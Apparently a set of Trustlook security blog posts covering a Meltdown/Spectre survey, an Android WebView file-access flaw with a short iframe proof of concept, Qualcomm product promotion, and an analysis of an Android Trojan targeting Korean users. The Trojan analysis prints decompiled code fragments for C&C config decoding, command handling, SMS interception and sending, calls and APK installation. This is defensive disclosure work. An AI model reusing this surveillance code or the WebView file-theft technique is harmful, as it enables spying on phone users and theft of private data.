74% of Consumers are Concerned About Meltdown and Spectre

We just released data that shows a large percentage of consumers are concerned about Meltdown and Spectre, two vulnerabilities that could permit attackers to gain unauthorized access to a computer’s memory. According to a January 2018 survey sent to 8000 of our users, 74 percent are either “Extremely Concerned” or “Somewhat Concerned” about the threats.

Meltdown and Spectre are flaws that affect nearly all modern processors, including chips from Intel, AMD, and those with ARM-based architectures, and can only be mitigated through operating system patches. Of the two, Meltdown poses the greater threat because it is easier to exploit and affects all kinds of computers, including personal computers and virtual machines in the cloud.

Our CEO had this response to the data:

“It is actually a really good sign that consumers are paying such close attention to these issues,” said Allan Zhang, CEO and co-founder of Trustlook. “Too often the public is criticized for not being diligent enough with their device security. So, the silver lining with Meltdown and Spectre is that it’s forced everyone to focus greater attention on security.”

Trustlook’s study revealed the following attitudes about Meltdown and Spectre:

▪ 38% Extremely Concerned
▪ 36% Somewhat Concerned
▪ 14% Not Very Concerned
▪ 12% Absolutely No Concern

For more information on Meltdown and Spectre, please visit https://meltdownattack.com.

Android WebView Class Poses Significant Security Risk

Tencent Security Labs recently reported a vulnerability that exists across some common apps. The report can be found at http://www.cnvd.org.cn/webinfo/show/4365. The issue, which has been around since 2014, has to do with the misconfiguration or misuse of the WebView class.

The Android WebView class is used to display HTML pages such as the UI or online content. WebView uses the WebKit rendering engine, which is included in many web browsers. The engine allows the user to navigate forward and backward, zoom in and out on a web page, and process JavaScript in the HTML document.

The following is an example of using WebView:

WebView webView = findViewById(R.id.webView);
WebSettings webSettings = webView.getSettings();

JavaScript is disabled in WebView by default, though the user can enable it. WebView settings also provide methods to interact with other content, such as:

  • setAllowFileAccess

Enables or disables file access in WebView. Note that the assets and resources are still accessible even if file access is disabled.

  • setAllowFileAccessFromFileURLs

Enables or disables the JavaScript in the file scheme URL from accessing content from other file scheme URLs. This setting is overwritten by setAllowUniversalAccessFromFileURLs

  • setAllowUniversalAccessFromFileURLs

Enables or disables the JavaScript in the file scheme URL from accessing content from any other source.

In web applications, there is a “same-origin policy,” which is used to restrict JavaScript on the page from accessing a user’s most important data. The browser’s policy is to check for protocol, host and port in URIs.

A brief sample of URIs compared with URL http: //www.example.com/index.html under the same-origin policy are shown below:

URL                                                             same-origin or not, and description

http: //www.example.com/index2.html        ; same-origin

https: //www.example.com/index.html        ; Not same-origin, protocol is different

http: //example.com/index.html                    ; Not same-origin, host is different

http: //www.example.com:88/index.html   ; Not same-origin, port is different

file:///data/local/tmp/index.html                ; Not same-origin, protocol and host are different

WebView implements the same-origin policy. If the JavaScript is used in the HTTP scheme, it can’t access the file scheme URLs. Normally, Android apps are running in separate processes. For instance, App A is not able to access the private data for App B, and vice versa. However, if setAllowFileAccess and setAllowUniversalAccessFromFileURLs are enabled, App A can run the exported activity from App B and pass the malicious file scheme URLs to the WebView in App B to access the private files in App B.

App B contains WebView which accepts the following parameter url:

WebView webView = findViewById(R.id.webView);

If App A passes a file scheme url file:///data/local/tmp/index.html” as the parameter “url” for the webView.loadUrl(url) in App B

The index.html file has the following content:

function readfile() {
<iframe id='iframe' src = "file:///data/data/com.test.webv/abc.txt" onload='readfile()'> </iframe>

App A accesses the private file from App B “/data/data/com.test.webv/abc.txt. In the above sample, the attacker must have the ability to drop the malicious HTML document into the user’s device.

Workarounds for this potential WebView vulnerability include:

  • Disable file scheme URLs in the app if file access is not needed. This can be accomplished by setting methods setAllowFileAccess as false. Since files in assets and res folder are not affected by these settings, some fixed HTML can be placed in these folders.
  • Check for file scheme URLs to eliminate directory traversal attacks.
  • If the app doesn’t use JavaScript in a WebView, set method setJavaScriptEnabled as false.
  • If activity export is not needed, set android:exported=”false” in the Activity tag in Manifest. Otherwise check the passed parameters for the WebView.

Qualcomm Chips Less Impacted by Meltdown and Spectre

Last week it was widely reported that two severe vulnerabilities were found in Intel chips, either of which could permit attackers to gain unauthorized access to a computer’s memory. The first vulnerability, Meltdown (CVE-2017-5754), can effectively remove the barrier between user applications and sensitive parts of the operating system. The second vulnerability, Spectre (CVE-2017-5753 and CVE-2017-5715), can trick vulnerable applications into leaking their memory contents. Of the two, Meltdown poses the greater threat because it is easier to exploit and affects all kinds of computers, including personal computers and virtual machines in the cloud.

Meltdown and Spectre affect nearly all modern processors, including chips from Intel, AMD, and those with ARM-based architectures such as Qualcomm’s, and can only be mitigated through operating system patches. The good news is that chips on mobile devices, of which Qualcomm is the leader, may have less exposure to risk than chips on PCs or virtual machines.

Qualcomm President Cristiano Amon has been quoted as saying that the recent Meltdown and Spectre security flaws are not concerns for the company and the mobile industry. According to TechCrunch, which reported the Qualcomm President’s quotes, Amon said, “There are a few things that are unique about the mobile ecosystem. Users download from an app store. On top of that, the impact you had on Android and ARM — we had patches that got released as early as December to some OEMs.” The report also adds that according to the Qualcomm President, “this is not an area of concern for us and the mobile ecosystem.” Moreover, Google said in a blog post that all Android devices with the latest security update are protected.

This affirmation by Qualcomm was a collective sigh of relief for many smartphone users. It is also important to Trustlook, as we work closely with Qualcomm to power advanced security solutions. Our software solutions, called SECUREai MP App and SECUREai MP Token, work in concert with the Qualcomm HavenTM Security Platform on Snapdragon chips, giving them unprecedented, built-in security features. This level of security is made possible by designing the security into the chip, and cannot be matched by software-based solutions.

Regardless of how unlikely it is for Qualcomm-powered smartphones to be impacted by Meltdown or Spectre, it is important to install the latest security updates as soon as they’re available. It won’t take long for bad actors to start exploiting these vulnerabilities, as much of the sample code has already been released to the public.


Trojan Utilizes Customized Communication Packets to Target Korean Speaking Users

Trustlook labs has discovered a Trojan which targets Korean speaking mobile users. The Trojan collects user data, including contacts, call logs, and SMS history. It also records audio, takes pictures, makes phone call, and sends SMS messages.

The Trojan disguises itself as a system app named “System Service,” and demands device administrator rights. This prevents it from being removed. The malware also removes its icon from the launcher menu to further mask itself.

The package can be identified as having the following characteristics:

  • MD5: b737d915ca36edbb24cb844ebfb621d9
  • SHA256: 734fb5812af358bc4d5a5d70e7c3c0321b9b16f8832d24b096393474bc9c3f8b
  • Size: 525055 bytes
  • App name: System Service
  • Package name: com.google.service

The package icon is:


Upon execution, the app persuades the user to enable Device Administrator Access in order to maintain its persistence on the system:


The message on the screen is in Korean. Translated into English it says: “Encrypted data transfer, your personal information can be protected.” The app targets Korean speaking users, and more specifically, mobile users in South Korea. Once the user clicks “Activate,” the app removes its icon from the launcher to hide itself. If the user attempts to disable the Device Administrator, the app will keep popping up the above window to force the user to re-enable it.

The app stores its C&C server IP port in a file “config.db” in the assets folder. It appears as follows: LCXwKS@0KS@sMSLeLCf2MA73MSDuLSL<

The app uses the following code snippets to decode the string:

    public boolean readConfig() {
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(getAssets().open("config.db")));
            try {
                int i;
                StringBuilder sb = new StringBuilder();
                while (true) {
                    String line = br.readLine();
                    if (line == null) {
                String config = sb.toString();
                byte[] buf = config.getBytes();
                byte[] buf1 = new byte[buf.length];
                for (i = 0; i < buf.length; i++) {
                    buf1[i] = (byte) (buf[i] + 1);
                byte[] buf2 = Base64.decode(buf1, 0);
                byte[] buf3 = new byte[buf2.length];
                for (i = 0; i < buf2.length; i++) {
                    buf3[i] = (byte) (buf2[i] + 1);
                config = new String(buf3, "utf-8");
                String[] data = config.split(" ");
                this.host = data[0];
                this.port = Integer.parseInt(data[1]);
                this.password = data[2];
                result = true;

The data in the config.db file above is decoded into the following string, which includes the C&C IP address, port and password used to encrypt the data:!1985!962024       

The app uses customized packets to communicate with the C&C server in order to avoid network detection. It processes four packets:

  • CommandPacket: These packets are used to store the command received from the server.
  • TransportPacket: These packets contain the data, data length, and sequence number, which are the main data exchange protocols between the app and the C&C server.
  • LogPacket: The app logs actions and uses these packets to send the log file.
  • PreferencePacket: These packets are mainly used to update the configuration between the app and the C&C server.

The following code snippets are used to process the CommandPacket:

    public CommandPacket(short cmd, int targetChannel, byte[] arg) {
        this.commande = cmd;
        this.argument = arg;
        this.targetChannel = targetChannel;

    public void parse(byte[] packet) {
        ByteBuffer b = ByteBuffer.wrap(packet);
        this.commande = b.getShort();
        this.targetChannel = b.getInt();
        this.argument = new byte[b.remaining()];
        b.get(this.argument, 0, b.remaining());

    public void parse(ByteBuffer b) {
        this.commande = b.getShort();
        this.targetChannel = b.getInt();
        this.argument = new byte[b.remaining()];
        b.get(this.argument, 0, b.remaining());

    public byte[] build() {
        byte[] byteCmd = ByteBuffer.allocate(2).putShort(this.commande).array();
        byte[] byteTargChan = ByteBuffer.allocate(4).putInt(this.targetChannel).array();
        byte[] cmdToSend = new byte[((byteCmd.length + byteTargChan.length) + this.argument.length)];
        System.arraycopy(byteCmd, 0, cmdToSend, 0, byteCmd.length);
        System.arraycopy(byteTargChan, 0, cmdToSend, byteCmd.length, byteTargChan.length);
        System.arraycopy(this.argument, 0, cmdToSend, byteCmd.length + byteTargChan.length, this.argument.length);
        return cmdToSend;

The following is the struct of CommandPacket:

struct CommandPacket 
    short command;
    byte[] argument;
    int channel;
} ;

The app supports the following commands:

Command     description
109                 ; display a message window

110                 ; monitor SMS

112                 ; get contacts

113                 ; get SMS message

114                 ; list file/directory

115                 ; send file

116                 ; make call

117                 ; send SMS

119                 ; stop SMS monitoring

121                 ; get device information

122                 ; open an URL in a browser

123                 ; vibrate

124                 ; download file

125                 ; install an APK

The following code snippets are used to monitor the SMS message:

   public SMSMonitor(MainService service, int channel, byte[] data) {
        this.ctx = service;
        this.channel = channel;
        this.numbersAndKeywords = EncoderHelper.decodeHashMap(data);
        this.numberList = new ArrayList();
        this.keywordList = new ArrayList();
        String keyword = (String) this.numbersAndKeywords.get("keyword");
        try {
            String[] phoneArray = ((String) this.numbersAndKeywords.get("phone")).split(";");
            for (Object add : phoneArray) {
            String[] keywordArray = keyword.split(";");
            for (Object add2 : keywordArray) {
        } catch (Exception e) {
        IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
        this.ctx.registerReceiver(this.SMSreceiver, intentFilter);

The malware collects device information by using the following code snippets:

public class DeviceInfo {
    int channel;
    MainService ctx;
    DeviceInformationPacket p = new DeviceInformationPacket();
    private void battryInfo(Intent intent) {
        int i = intent.getIntExtra("health", 0);
        int j = intent.getIntExtra("level", 0);
        int k = intent.getIntExtra("plugged", 0);
        boolean bool = intent.getExtras().getBoolean("present");
        int m = intent.getIntExtra("scale", 0);

    public void sensorsInfo() {
        List<Sensor> sensors = ((SensorManager) this.ctx.getSystemService("sensor")).getSensorList(-1);
        ArrayList<String> list = new ArrayList();
        for (Sensor name : sensors) {

The following code snippets are used to send SMS message:

HashMap<String, String> map = EncoderHelper.decodeHashMap(byteBuffer.array());
                String number = (String) map.get(Protocol.KEY_SEND_SMS_NUMBER);
                String body = (String) map.get(Protocol.KEY_SEND_SMS_BODY);
                if (body.getBytes().length < 167) {
                    SmsManager.getDefault().sendTextMessage(number, null, body, null, null);
                } else {
                    SmsManager.getDefault().sendMultipartTextMessage(number, null, MessageDecoupator(body), null, null);

The following code snippets are responsible for making phone calls:

               Intent intent = new Intent("android.intent.action.CALL", Uri.parse("tel:" + new String(byteBuffer.array())));

The app uses the code below to install the downloaded APK:

public class ApkInstaller {
    private MainService service;

    public ApkInstaller(MainService service, int channel) {
        this.service = service;

    public void hideInstall(String apkAbsolutePath) {

    public void installApk(String apkPath) {

    public void normalInstall(String apkPath) {
        Intent intent = new Intent("android.intent.action.VIEW");
        intent.setDataAndType(Uri.fromFile(new File(apkPath)), "application/vnd.android.package-archive");

The Trojan uses customized communication packets to avoid network detection. It allows the attacker to take full control of the device in order to steal data, monitor usage, and perform other actions that violate a user’s privacy. Trustlook’s anti-threat platform can effectively protect users against this invasion.